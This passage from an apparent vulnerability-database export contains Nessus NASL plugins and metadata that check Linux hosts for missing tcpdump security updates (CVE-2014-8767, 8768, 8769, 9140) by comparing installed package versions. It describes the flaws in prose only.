The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80253);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2014/12/26 14:03:25 $\");\n\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8769\");\n\n script_name(english:\"SuSE 11.3 Security Update : tcpdump (SAT Patch Number 10093)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"tcpdump has been updated to fix two security issues :\n\n - Unreliable output using malformed AOVD payload.\n (CVE-2014-8769). (bnc#905872)\n\n - Denial of service in verbose mode using malformed OLSR\n payload. (CVE-2014-8767). (bnc#905870)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=905870\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=905872\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8767.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8769.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 10093.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/26\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"tcpdump-3.9.8-1.23.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"tcpdump-3.9.8-1.23.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"tcpdump-3.9.8-1.23.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:22:57", "bulletinFamily": "scanner", "description": "Security fix for CVE-2014-8767 CVE-2014-8769\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2015-10-19T00:00:00", "id": "FEDORA_2014-15549.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=79700", "published": "2014-12-04T00:00:00", "title": "Fedora 19 : tcpdump-4.4.0-4.fc19 (2014-15549)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-15549.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79700);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:14:43 $\");\n\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8769\");\n script_bugtraq_id(71150, 71153);\n script_xref(name:\"FEDORA\", value:\"2014-15549\");\n\n script_name(english:\"Fedora 19 : tcpdump-4.4.0-4.fc19 (2014-15549)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2014-8767 CVE-2014-8769\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1165160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1165162\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-December/145201.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4f5c4106\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = 
get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"tcpdump-4.4.0-4.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:02", "bulletinFamily": "scanner", "description": "Updated tcpdump package fixes security vulnerabilities :\n\nThe Tcpdump program could crash when processing a malformed OLSR payload when the verbose output flag was set (CVE-2014-8767).\n\nThe application decoder for the Ad hoc On-Demand Distance Vector (AODV) protocol in Tcpdump fails to perform input validation and performs unsafe out-of-bound accesses. The application will usually not crash, but perform out-of-bounds accesses and output/leak larger amounts of invalid data, which might lead to dropped packets. It is unknown if a payload exists that might trigger segfaults (CVE-2014-8769).\n\nIt was discovered that tcpdump incorrectly handled printing PPP packets. 
A remote attacker could use this issue to cause tcpdump to crash, resulting in a denial of service, or possibly execute arbitrary code (CVE-2014-9140).", "modified": "2018-07-19T00:00:00", "id": "MANDRIVA_MDVSA-2014-240.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=79985", "published": "2014-12-15T00:00:00", "title": "Mandriva Linux Security Advisory : tcpdump (MDVSA-2014:240)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:240. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79985);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/07/19 20:59:18\");\n\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8769\", \"CVE-2014-9140\");\n script_bugtraq_id(71150, 71153, 71468);\n script_xref(name:\"MDVSA\", value:\"2014:240\");\n\n script_name(english:\"Mandriva Linux Security Advisory : tcpdump (MDVSA-2014:240)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated tcpdump package fixes security vulnerabilities :\n\nThe Tcpdump program could crash when processing a malformed OLSR\npayload when the verbose output flag was set (CVE-2014-8767).\n\nThe application decoder for the Ad hoc On-Demand Distance Vector\n(AODV) protocol in Tcpdump fails to perform input validation and\nperforms unsafe out-of-bound accesses. The application will usually\nnot crash, but perform out-of-bounds accesses and output/leak larger\namounts of invalid data, which might lead to dropped packets. 
It is\nunknown if a payload exists that might trigger segfaults\n(CVE-2014-8769).\n\nIt was discovered that tcpdump incorrectly handled printing PPP\npackets. A remote attacker could use this issue to cause tcpdump to\ncrash, resulting in a denial of service, or possibly execute arbitrary\ncode (CVE-2014-9140).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0503.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0511.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif 
(!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tcpdump-4.2.1-2.2.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:22:55", "bulletinFamily": "scanner", "description": "Security fix for CVE-2014-8767 CVE-2014-8768 CVE-2014-8769\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2015-10-19T00:00:00", "id": "FEDORA_2014-15541.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=79608", "published": "2014-11-28T00:00:00", "title": "Fedora 20 : tcpdump-4.5.1-2.fc20 (2014-15541)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-15541.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79608);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:14:43 $\");\n\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8768\", \"CVE-2014-8769\");\n script_xref(name:\"FEDORA\", value:\"2014-15541\");\n\n script_name(english:\"Fedora 20 : tcpdump-4.5.1-2.fc20 (2014-15541)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2014-8767 CVE-2014-8768 CVE-2014-8769\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1165160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1165161\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1165162\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/144951.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?03e6da40\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: 
\"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"tcpdump-4.5.1-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:22:57", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in tcpdump, a command-line network traffic analyzer. These vulnerabilities might result in denial of service, leaking sensitive information from memory or, potentially, execution of arbitrary code.", "modified": "2018-11-10T00:00:00", "id": "DEBIAN_DSA-3086.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=79697", "published": "2014-12-04T00:00:00", "title": "Debian DSA-3086-1 : tcpdump - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3086. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79697);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/10 11:49:36\");\n\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8769\", \"CVE-2014-9140\");\n script_bugtraq_id(71150, 71153);\n script_xref(name:\"DSA\", value:\"3086\");\n\n script_name(english:\"Debian DSA-3086-1 : tcpdump - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in tcpdump, a\ncommand-line network traffic analyzer. These vulnerabilities might\nresult in denial of service, leaking sensitive information from memory\nor, potentially, execution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=770424\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=770434\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/tcpdump\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-3086\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the tcpdump packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 4.3.0-1+deb7u1.\n\nFor the upcoming stable distribution (jessie), these problems have\nbeen fixed in version 4.6.2-3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"tcpdump\", reference:\"4.3.0-1+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:30", "bulletinFamily": "scanner", "description": "tcpdump was updated to fix three security issues.\n\nThese security issues were fixed :\n\n - CVE-2014-8767: Integer underflow in the olsr_print function in tcpdump 3.9.6 through 4.6.2, when in verbose mode, allowed remote attackers to cause a denial of service (crash) via a crafted length value in an OLSR frame 
(bnc#905870 905871).\n\n - CVE-2014-8769: tcpdump 3.8 through 4.6.2 might allow remote attackers to obtain sensitive information from memory or cause a denial of service (packet loss or segmentation fault) via a crafted Ad hoc On-Demand Distance Vector (AODV) packet, which triggers an out-of-bounds memory access (bnc#905871 905872).\n\n - CVE-2014-8768: Multiple Integer underflows in the geonet_print function in tcpdump 4.5.0 through 4.6.2, when in verbose mode, allowed remote attackers to cause a denial of service (segmentation fault and crash) via a crafted length value in a Geonet frame (bnc#905871).", "modified": "2015-03-11T00:00:00", "id": "OPENSUSE-2015-146.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81371", "published": "2015-02-16T00:00:00", "title": "openSUSE Security Update : tcpdump (openSUSE-2015-146)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-146.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81371);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2015/03/11 13:51:32 $\");\n\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8768\", \"CVE-2014-8769\");\n\n script_name(english:\"openSUSE Security Update : tcpdump (openSUSE-2015-146)\");\n script_summary(english:\"Check for the openSUSE-2015-146 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"tcpdump was updated to fix three security issues.\n\nThese security issues were fixed :\n\n - CVE-2014-8767: Integer underflow in the olsr_print\n function in tcpdump 3.9.6 through 4.6.2, when in verbose\n mode, allowed remote attackers to cause a denial of\n service (crash) via a crafted 
length value in an OLSR\n frame (bnc#905870 905871).\n\n - CVE-2014-8769: tcpdump 3.8 through 4.6.2 might allow\n remote attackers to obtain sensitive information from\n memory or cause a denial of service (packet loss or\n segmentation fault) via a crafted Ad hoc On-Demand\n Distance Vector (AODV) packet, which triggers an\n out-of-bounds memory access (bnc#905871 905872).\n\n - CVE-2014-8768: Multiple Integer underflows in the\n geonet_print function in tcpdump 4.5.0 through 4.6.2,\n when in verbose mode, allowed remote attackers to cause\n a denial of service (segmentation fault and crash) via a\n crafted length value in a Geonet frame (bnc#905871).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=905870\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=905871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=905872\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tcpdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tcpdump-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script 
is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"tcpdump-4.4.0-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"tcpdump-debuginfo-4.4.0-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"tcpdump-debugsource-4.4.0-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"tcpdump-4.6.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"tcpdump-debuginfo-4.6.2-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"tcpdump-debugsource-4.6.2-4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump / tcpdump-debuginfo / tcpdump-debugsource\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": 
